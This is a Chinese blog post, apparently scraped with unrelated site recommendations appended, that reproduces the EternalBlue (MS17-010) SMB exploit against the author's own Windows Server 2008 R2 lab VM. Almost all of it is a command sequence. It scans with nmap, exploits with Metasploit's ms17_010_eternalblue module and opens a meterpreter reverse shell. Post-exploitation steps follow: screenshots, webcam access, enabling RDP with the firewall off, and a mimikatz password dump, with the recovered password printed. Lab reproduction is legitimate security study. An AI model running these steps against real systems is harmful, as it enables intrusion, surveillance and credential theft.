猫宁!!!

参考:

https://www.anquanke.com/post/id/86245

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/backlion/p/9484949.html

https://www.jianshu.com/p/91588e284fe8

“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。

微软的漏洞2个漏洞公告

https://support.microsoft.com/zh-cn/help/4012598/title

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN

windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。

https://msdn.itellyou.cn/

记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。

虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式

ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap/scripts/

nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明开启了445端口,存在漏洞。

msfconsole,启动MSF

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010,使用POC进行扫描

set RHOST 192.168.100.27

run

证实存在漏洞

use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.100.27

run

竟然把服务器给打重启了,没有连接上去

show payloads,看一下更多种类的payload,46个

show targets,显示适用的目标

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp,这个payload非常有助于后期的植入后门进行权限维持。

set RHOST 192.168.100.27

run

成功进入服务器系统

screenshot,截屏

webcam_scream,可以开启摄像头

run post/windows/manage/enable_rdp,开启远程桌面并关闭防火墙

shell,直接进入系统

load mimikatz,加载密码读取工具

wdigest,成功获取我的密码

rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!

远程连接服务器就好了

arp查看内网情形

获得当前木马进程,getid

ps查看

获取用户的身份和权限

判断服务器是不是被人在使用

run和bgrun,有大量的帮助文件

sysinfo,显示计算机信息

PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现的更多相关文章

  1. “永恒之蓝"漏洞的紧急应对--毕业生必看

    早上6点多起床了,第一次起这么早,昨天晚上12点多,看到了一则紧急通知,勒索软件通过微软"永恒之蓝"漏洞针对教育网进行了大规模的攻击,而且有很多同学中招.中招后的结果如下图所示. ...

  2. 【研究】ms17-010永恒之蓝漏洞复现

    1       永恒之蓝漏洞复现(ms17-010) 1.1     漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放44 ...

  3. EternalBlue永恒之蓝漏洞复现

    EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”( ...

  4. Metasploitable3学习笔记--永恒之蓝漏洞复现

    漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不 ...

  5. CVE-2019-0797漏洞:Windows操作系统中的新零日在攻击中被利用

    https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/ 前言 在2019年2月,卡巴实验室的自动漏洞防护(AEP)系统检测 ...

  6. 使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)

    1.开启postgresql数据库 2.msfconsole 进入MSF中 3.search 17-010 搜索cve17-010相关的exp auxiliary/scanner/smb/smb_ms ...

  7. ms17-010 永恒之蓝漏洞复现(CVE-2017-0143)

    0x01 首先对目标机的开放端口进行探测,我们可以使用探测神器nmap 发现开放的445端口,然后进行下一步的ms17-010的漏洞验证 0x02 打开MSF美少妇神器,用search命令搜索ms17 ...

  8. 永恒之蓝MS17-010漏洞复现

    永恒之蓝MS17-010漏洞复现 1.漏洞描述: 起因: 永恒之蓝(Eternalblue)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包 ...

  9. 永恒之蓝及WannaCry分析

    以下部分是我的一次大作业,写了大概有一周,拿出来凑篇博客,如果有错误的地方,还请指正.粘贴过程中可能图片有错误. 1.环境搭建及简介 1.1 实验环境 Windows 7 (靶机) Parrot(攻击 ...

随机推荐

  1. 算法:统计1-n中,1出现的次数

    package edu.cqu.algorithmTest; import java.util.Scanner; /* * 给定一个十进制正整数N,写下从1开始,到N的所有整数,然后数一下其中出现的所 ...

  2. mysql 1040 连接数太多 mysql Error 1040 too many connection解决办法

    近在用SpringMVC开发的时候,突然出现1040 too many connection的错误,看错误的意思是连接的人数太多了.百度经验:jingyan.baidu.com 方法/步骤   1 当 ...

  3. jQuery.extend([deep], target, object1, [objectN])

    jQuery.extend([deep], target, object1, [objectN]) 概述 用一个或多个其他对象来扩展一个对象,返回被扩展的对象.直线电机 如果不指定target,则给j ...

  4. 数据库读写分离、分表分库——用Mycat

    转:     https://www.cnblogs.com/joylee/p/7513038.html 系统开发中,数据库是非常重要的一个点.除了程序的本身的优化,如:SQL语句优化.代码优化,数据 ...

  5. java实现文件夹上传

    文件上传下载,与传统的方式不同,这里能够上传和下载10G以上的文件.而且支持断点续传. 通常情况下,我们在网站上面下载的时候都是单个文件下载,但是在实际的业务场景中,我们经常会遇到客户需要批量下载的场 ...

  6. Asia-Jakarata 2018

    目录 Contest Info Solutions Problem A. Edit Distance Problem C. Smart Thief Problem D.Icy Land Problem ...

  7. rxjs——subject和Observable的区别

    原创文章,转载请注明出处 理解 observable的每个订阅者之间,是独立的,完整的享受observable流动下来的数据的. subject的订阅者之间,是共享一个留下来的数据的 举例 这里的cl ...

  8. 8月清北学堂培训 Day6

    今天是杨思祺老师的讲授~ 图论 双连通分量 在无向图中,如果无论删去哪条边都不能使得 u 和 v 不联通, 则称 u 和 v 边双连通: 在无向图中,如果无论删去哪个点(非 u 和 v)都不能使得 u ...

  9. Python中greenlet和gevent使用示例

    目录 greenlet示例 示例1,线程切换 示例2 gevent 示例1 示例2: gevent使用monkey对所有系统自带的IO操作打patch 示例3,发送请求 示例4:使用gevent的so ...

  10. git修改下载地址

    git查看远程地址git remote -v修改git remote set-url origin [url]